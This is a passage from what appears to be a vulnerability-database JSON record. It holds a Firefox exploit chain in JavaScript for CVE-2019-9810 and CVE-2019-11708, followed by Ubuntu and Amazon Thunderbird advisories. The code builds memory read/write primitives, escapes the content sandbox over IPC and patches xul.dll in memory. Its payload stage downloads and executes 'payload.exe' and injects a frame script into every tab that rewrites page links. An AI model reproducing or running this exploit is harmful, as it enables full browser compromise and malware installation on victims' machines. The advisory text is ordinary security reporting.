SizeInDwords = 2;\n const SavedSlot = [\n Biggie[Biggie2AdjacentSize],\n Biggie[Biggie2AdjacentSize + 2 + 2],\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\n ];\n\n //\n // Corrupt the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\n\n //\n // Write to arbitrary location now.\n //\n\n AdjacentArray[0] = Number(Value & 0xffffffffn);\n AdjacentArray[1] = Number(Value >> 32n);\n\n //\n // Restore the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\n return true;\n };\n\n const AddrOf = Obj => {\n AdjacentArray.hell_on_earth = Obj;\n // 0:000> dqs 1ae5716e76a0\n // 00001ae5`716e76a0 00001ae5`7167dfd0\n // 00001ae5`716e76a8 000010c5`8e73c6a0\n // 00001ae5`716e76b0 00000238`9334e790\n // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10\n // 00001ae5`716e76c0 fffa0000`00000000\n // 00001ae5`716e76c8 fff88000`00bbccdd\n // 0:000> !telescope 0x00002389334e790\n // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)\n const SlotOffset = Biggie2AdjacentSize - (3 * 2);\n const SlotsAddress = BigInt.fromUint32s(\n Biggie.slice(SlotOffset, SlotOffset + 2)\n );\n\n return BigInt.fromJSValue(ReadPtr(SlotsAddress));\n };\n\n //\n // Let's move the battle field to the TenuredHeap\n //\n\n const ArrayBufferLength = 10;\n const AB1 = new ArrayBuffer(ArrayBufferLength);\n const AB2 = new ArrayBuffer(ArrayBufferLength);\n const AB1Address = AddrOf(AB1);\n const AB2Address = AddrOf(AB2);\n\n dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);\n dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);\n WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);\n WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);\n\n if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {\n dbg('Corrupting the ArrayBuffers failed :(.');\n return false;\n }\n\n const Primitives = BuildPrimitives(AB1, AB2);\n Math.atan2(AB2);\n\n //\n // All right, time to clean up behind ourselves.\n // Let's fix AdjacentArray's size first (as we are using Biggie to do it).\n //\n\n Biggie[Biggie2AdjacentSize] = ArraySize;\n\n //\n // Let's fix Biggie's length as we are done with it.\n // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580\n // Detected xul.dll, using it as js module.\n // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array\n // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0\n // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...})\n // @$smdump_jsvalue(0xfffe11e6fa2f7580)\n //\n // 0:000> !telescope 0x11e6fa2f7580\n // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\n // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\n // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)\n // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)\n // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)\n // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)\n //\n\n const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;\n Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));\n\n //\n // From there, we're kinda done - let's get god mode and fuck off.\n //\n\n GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);\n return true;\n}\n\n//\n// This function uses a `Sandbox` with a `System Principal` to be able to grab the\n// `docShell` object off the `window` object. Once it has it, it can grab the frame\n// `messageManager` that we need to trigger the sandbox escape.\n//\n\nfunction GetContentFrameMessageManager(Win) {\n function _GetDocShellFromWindow(Win) {\n return Win.docShell;\n }\n\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\n const Cu = Components.utils;\n const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());\n const Code = _GetDocShellFromWindow.toSource();\n Cu.evalInSandbox(Code, Sbx);\n const DocShell = Sbx._GetDocShellFromWindow(Win);\n Cu.nukeSandbox(Sbx);\n return DocShell.messageManager;\n}\n\n//\n// This function sends a 'Prompt:Open' message over the frame message manager IPC,\n// with an URI.\n//\n\nfunction PromptOpen(Uri) {\n const FrameMM = GetContentFrameMessageManager(window);\n const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });\n return Result;\n}\n\n//\n// This is the function that abuses the `Prompt:Open` message to re-exploit the parent\n// process and escape the sandbox.\n//\n\nfunction TriggerCVE_2019_11708() {\n PromptOpen(`${location.origin}?stage3`);\n}\n\n//\n// This is the function that gets written into the frame script the exploit drops\n// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a\n// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:\n// Services.mm.loadFrameScript('file://frame-script.js', true)\n// This should break in the `Browser Content Toolbox` debugger window.\n//\n\nfunction FrameScriptPayload() {\n function PimpMyDocument() {\n\n //\n // Don't infect doar-e and leave Cthulhu alone...\n //\n\n if(content.document.location.origin == 'https://doar-e.github.io' ||\n content.document.location.origin == 'http://localhost:8000') {\n return;\n }\n\n //\n // .. as well as don't play with non http origins (I've seen empty/null origins).\n //\n\n if(!content.document.location.origin.startsWith('http')) {\n return;\n }\n\n //\n // Time to party! Let's find every `A` tag and make them point to doar-e.\n // We also use this opportunity to make every `backgroundImage` / `backgroundColor`\n // style attributes to `none` / `transparent` to not hide the doar-e background.\n //\n\n for(const Node of content.document.getElementsByTagName('*')) {\n if(Node.tagName == 'A') {\n Node.href = 'https://doar-e.github.io/';\n continue;\n }\n\n Node.style.backgroundImage = 'none';\n Node.style.backgroundColor = 'transparent';\n }\n\n //\n // Change the background.\n //\n\n content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';\n }\n\n //\n // First we set an event handler to make sure to be invoked when a new `content`\n // is created. Keep in mind that we basically have ~three cases to handle:\n // 1/ We are getting injected in an already existing tab,\n // 2/ We are getting injected in a new tab,\n // 3/ A user clicks on a link and a new `content` gets created.\n // We basically want to have control over those three events. The below ensures\n // we get a chance to execute code for 2/.\n //\n\n addEventListener('DOMWindowCreated', FrameScriptPayload);\n dump(`Hello from: ${content.location.origin}\\n`);\n\n if(content.document != null && content.document.body != null) {\n\n //\n // Either the tab already existed in which case we already have a document which we\n // can play with...\n //\n\n PimpMyDocument();\n return;\n }\n\n //\n // ..Or it doesn't exist quite yet and we want to get a callback when it does.\n //\n\n content.addEventListener('load', PimpMyDocument);\n}\n\n//\n// This function drops a file (open + write + close) using the OSFile JS module.\n//\n\nfunction DropFile(Path, Content) {\n\n //\n // We expect either a string or a TypedArray.\n //\n\n const Encoder = new TextEncoder();\n const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;\n return OS.File.open(Path, {write: true, truncate: true})\n .then(File => {\n return Promise.all([\n // We return the File object in order to be able to use it in the\n // next `.then`. This allows us to chain the `write` and the `close`\n // without another level of deepness.\n File,\n File.write(ContentBuffer),\n ]);\n })\n .then((Results) => {\n const [File, _WrittenBytes] = Results;\n return File.close();\n });\n}\n\n//\n// This function drops / executes a payload binary, as well as inject a frame script\n// into every tabs.\n//\n\nfunction Payload() {\n\n //\n // Import a bunch of JS modules we will be using later.\n //\n\n const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\n\n //\n // First order of business, we create a first promise that downloads the payload\n // (aka Slime Shady), drops it in the profile directory and finally executes it.\n //\n\n const Dir = OS.Constants.Path.localProfileDir;\n const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');\n const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)\n .then((Response) => {\n\n //\n // We return the result as a TypedArray as this is what `DropFile`\n // expects for binary content.\n //\n\n return Response.arrayBuffer();\n })\n .then((Content) => {\n\n //\n // Time to drop the file now. Note that we return the promise so\n // the next `then` executes when the file has been successfully dropped.\n //\n\n dbg(`Payload downloaded.`);\n return DropFile(PayloadPath, new Uint8Array(Content));\n })\n .then(() => {\n\n //\n // At this point, we are ready to spawn the payload, let's do it!\n //\n\n dbg(`Creating the process.. ${PayloadPath}`);\n CreateProcessA(PayloadPath);\n })\n .catch(Ex => {\n console.log(`Exception in payload promise: ${Ex}`);\n });\n\n //\n // Second order of business is to backdoor the tabs. To do so, we drop a frame\n // script that we inject into every tabs.\n //\n\n const FramePayloadContent = `${FrameScriptPayload.toSource()}\n\nFrameScriptPayload();`;\n const ScriptPath = OS.Path.join(Dir, 'frame-script.js');\n const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)\n .then(() => {\n\n //\n // At this time we are ready to inject the frame script into the tabs.\n // Note that we need to drop the file locally / use the file:// scheme\n // so that the tabs accept to interpret the file (unfortunately,\n // remote ones are ignored).\n //\n\n dbg(`About to loadFrameScript: ${ScriptPath}`);\n Services.mm.loadFrameScript(`file://${ScriptPath}`, true);\n })\n .catch(Ex => {\n console.log(`Exception in frame payload promise: ${Ex}`);\n });\n\n\n //\n // Last but not least, we set up code to execute on completion of both the above\n // promises. You have to remember that at this point the modal window is still open\n // and blocks navigation / UI interaction, so we need to close it as soon as we can\n // to be as stealth as possible.\n // Just for kicks, we spawn a calculator when we're done because why not.\n //\n\n Promise.all([PayloadPromise, FramePayloadPromise])\n .then(() => {\n\n //\n // .. just for kicks.\n //\n\n CreateProcessA('c:\\\\windows\\\\system32\\\\calc.exe');\n\n //\n // Phew, we made it here let's close the window :).\n //\n\n window.close();\n })\n .catch(Ex => {\n console.log(`Exception in clean up promise: ${Ex}`);\n window.close();\n });\n}\n\n//\n// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()\n// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have\n// god mode. It's far from being the cleanest way, but this is the easiest way I found.\n//\n// nsresult nsSocketTransport::InitiateSocket() {\n// SOCKET_LOG((\"nsSocketTransport::InitiateSocket [this=%p]\\n\", this));\n// nsresult rv;\n// bool isLocal;\n// IsLocal(&isLocal);\n// if (gIOService->IsNetTearingDown()) {\n// return NS_ERROR_ABORT;\n// }\n// if (gIOService->IsOffline()) {\n// if (!isLocal) return NS_ERROR_OFFLINE;\n// } else if (!isLocal) {\n// if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&\n// !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {\n// nsAutoCString ipaddr;\n// RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);\n// netaddr->GetAddress(ipaddr);\n// fprintf_stderr(\n// stderr,\n// \"FATAL ERROR: Non-local network connections are disabled and a \"\n// \"connection \"\n// \"attempt to %s (%s) was made.\\nYou should only access hostnames \"\n// \"available via the test networking proxy (if running mochitests) \"\n// \"or from a test-specific httpd.js server (if running xpcshell \"\n// \"tests). \"\n// \"Browser services should be disabled or redirected to a local \"\n// \"server.\\n\",\n// mHost.get(), ipaddr.get());\n// MOZ_CRASH(\"Attempting to connect to non-local address!\");\n// }\n// }\n//\n\nfunction PatchInitiateSocket() {\n\n //\n // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket\n // so that it doesn't assert on us because we turned on testing features.\n // This is the assert we hit without the patch:\n //\n // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.\n // You should only access hostnames available via the test networking proxy\n // (if running mochitests) or from a test-specific httpd.js server (if running\n // xpcshell tests). Browser services should be disabled or redirected to a local\n // server.\n // (4014.82c): Break instruction exception - code 80000003 (first chance)\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:\n // 00007ff9`69a66372 cc int 3\n //\n // Here is the disasembly before:\n //\n // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\n // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\n // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)]\n //\n // And after:\n //\n // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\n // 00007ff9`3f9c55c6 90 nop\n // 00007ff9`3f9c55c7 90 nop\n // 00007ff9`3f9c55c8 90 nop\n // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\n //\n // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul\n // Evaluate expression: 1529286 = 00000000`001755c6\n //\n\n const PatchOffset = 0x001755c6n;\n const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());\n const PatchAddress = XulBase + PatchOffset;\n const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];\n PatchCode(PatchAddress, PatchContent);\n}\n\nfunction Main(Route) {\n\n //\n // One way to tell if we were successful with our data corruption is by checking\n // if we have access to the PrivilegeManager. If we do, it means we are running\n // with a privileged context, if not we don't.\n //\n\n const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;\n if(Route == '?stage1') {\n\n //\n // If we are asked to run stage1 with access to a privileged context, we skip\n // it and move on to stage2.\n //\n\n if(RunningFromPrivilegedJS) {\n return Main('?stage2');\n }\n\n //\n // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access\n // a privileged JS context.\n //\n\n if(!ExploitCVE_2019_9810()) {\n console.log('Failed :(');\n return;\n }\n\n //\n // Once we are done with the data corruption, we refresh the page to get access\n // to the privileged JS context. Moving on to stage2 \\o/.\n //\n\n location.replace(`${location.origin}/?stage2`);\n }\n\n if(Route == '?stage2') {\n\n //\n // At this point we expect to have access to a privileged JS context.\n // If we don't it's probably bad news, so we'll just bail.\n //\n\n if(!RunningFromPrivilegedJS) {\n alert('problem');\n return;\n }\n\n //\n // Turn on privileges so that we can access the `Components` object.\n //\n\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\n\n\n //\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\n // to avoid the Firefox being unhappy.\n //\n\n PatchInitiateSocket()\n\n //\n // Now that we have access to the privileged context, we are also able to talk\n // over the frame message manager IPC and trigger CVE-2019-11708 to escape the\n // exploit the parent process.\n //\n\n TriggerCVE_2019_11708();\n }\n\n if(Route == '?stage3') {\n\n //\n // We should now be running in the broker which means we can exploit CVE-2019-9810\n // to perform the same attack than in stage1 but this time in the parent process.\n //\n\n if(!ExploitCVE_2019_9810()) {\n console.log('Elevation failed, closing the window.');\n window.close();\n }\n\n //\n // If we are successful it means that by refreshing the page, we should have\n // access to the privileged JS context from the parent process.\n // This basically means full compromise and we move on to backdooring the tabs,\n // as well as dropping the payload.\n //\n\n location.replace(`${location.origin}/?final`);\n }\n\n if(Route == '?final') {\n\n //\n // All right, we start of by turning on privileges so that we can access `Components`\n // & cie.\n //\n\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\n\n //\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\n // to avoid the Firefox being unhappy.\n //\n\n PatchInitiateSocket()\n\n //\n // We've worked hard to get here and it's time to drop the goodies :).\n //\n\n Payload();\n }\n}\n\nfunction Onload() {\n if(location.search != '') {\n Main(location.search);\n }\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:43:48", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "It was discovered that Thunderbird allowed PAC files to specify that \nrequests to localhost are sent through the proxy to another server. If \nproxy auto-detection is enabled, an attacker could potentially exploit \nthis to conduct attacks on local services and tools. (CVE-2018-18506)\n\nMultiple security issues were discovered in Thunderbird. If a user were \ntricked in to opening a specially crafted website in a browsing context, \nan attacker could potentially exploit these to cause a denial of service, \nor execute arbitrary code. (CVE-2019-9788, CVE-2019-9790, CVE-2019-9791, \nCVE-2019-9792, CVE-2019-9795, CVE-2019-9796, CVE-2019-9810, CVE-2019-9813)\n\nA mechanism was discovered that removes some bounds checking for string, \narray, or typed array accesses if Spectre mitigations have been disabled. \nIf a user were tricked in to opening a specially crafted website in a \nbrowsing context with Spectre mitigations disabled, an attacker could \npotentially exploit this to cause a denial of service, or execute \narbitrary code. (CVE-2019-9793)", "edition": 4, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "USN-3927-1", "href": "https://ubuntu.com/security/notices/USN-3927-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "**Issue Overview:**\n\nWhen proxy auto-detection is enabled, if a web server serves a Proxy Auto-Configuration (PAC) file or if a PAC file is loaded locally, this PAC file can specify that requests to the localhost are to be sent through the proxy to another server. This behavior is disallowed by default when a proxy is manually configured, but when enabled could allow for attacks on services and tools that bind to the localhost for networked behavior if they are accessed through browsing. ([CVE-2018-18506 __](<https://access.redhat.com/security/cve/CVE-2018-18506>))\n\nType inference is incorrect for constructors entered through on-stack replacement with IonMonkey ([CVE-2019-9791 __](<https://access.redhat.com/security/cve/CVE-2019-9791>))\n\nImproper bounds checks when Spectre mitigations are disabled ([CVE-2019-9793 __](<https://access.redhat.com/security/cve/CVE-2019-9793>))\n\nUse-after-free when removing in-use DOM elements ([CVE-2019-9790 __](<https://access.redhat.com/security/cve/CVE-2019-9790>))\n\nIonmonkey type confusion with __proto__ mutations ([CVE-2019-9813 __](<https://access.redhat.com/security/cve/CVE-2019-9813>))\n\nIonMonkey MArraySlice has incorrect alias information ([CVE-2019-9810 __](<https://access.redhat.com/security/cve/CVE-2019-9810>))\n\nType-confusion in IonMonkey JIT compiler ([CVE-2019-9795 __](<https://access.redhat.com/security/cve/CVE-2019-9795>))\n\nUse-after-free with SMIL animation controller ([CVE-2019-9796 __](<https://access.redhat.com/security/cve/CVE-2019-9796>))\n\nMemory safety bugs fixed in Mozilla libraries ([CVE-2019-9788 __](<https://access.redhat.com/security/cve/CVE-2019-9788>))\n\nIonMonkey leaks JS_OPTIMIZED_OUT magic value to script ([CVE-2019-9792 __](<https://access.redhat.com/security/cve/CVE-2019-9792>))\n\n \n**Affected Packages:** \n\n\nthunderbird\n\n \n**Issue Correction:** \nRun _yum update thunderbird_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n src: \n thunderbird-60.6.1-1.amzn2.0.1.src \n \n x86_64: \n thunderbird-60.6.1-1.amzn2.0.1.x86_64 \n thunderbird-debuginfo-60.6.1-1.amzn2.0.1.x86_64 \n \n \n", "edition": 1, "modified": "2019-04-25T16:37:00", "published": "2019-04-25T16:37:00", "id": "ALAS2-2019-1195", "href": "https://alas.aws.amazon.com/AL2/ALAS-2019-1195.html", "title": "Critical: thunderbird", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}